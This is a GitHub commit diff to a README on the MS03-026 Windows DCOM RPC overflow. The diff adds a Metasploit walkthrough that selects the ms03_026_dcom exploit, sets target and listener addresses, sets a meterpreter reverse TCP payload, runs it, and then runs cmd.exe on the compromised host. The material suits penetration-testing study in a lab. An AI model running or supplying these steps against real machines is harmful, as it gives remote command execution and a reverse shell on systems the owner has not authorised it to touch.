We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 0a81214 commit cb3c806Copy full SHA for cb3c806
MS03-026/README.md
@@ -5,6 +5,18 @@ MS03-026
5
Vulnerability reference:
6
* [MS03-026](https://technet.microsoft.com/library/security/ms03-026)
7
8
+## msf Usage
9
+* [YouTube-ms03 026](https://www.youtube.com/watch?v=OZwQo8kqdBM)
10
+```
11
+msf > search ms03_026
12
+msf > use exploit/windows/dcerpc/ms03_026_dcom
13
+msf exploit(ms03_026_dcom) > set RHOST 192.168.229.129
14
+msf exploit(ms03_026_dcom) > set LHOST 192.168.229.35
15
+msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/reverse_tcp
16
+msf exploit(ms03_026_dcom) > exploit
17
+
18
+meterpreter > execute -f cmd.exe -c -1
19
20
21
## References
22
[Microsoft Windows DCOM RPC接口长主机名远程缓冲区溢出漏洞](http://blog.chinaunix.net/uid-286494-id-2134482.html)
0 commit comments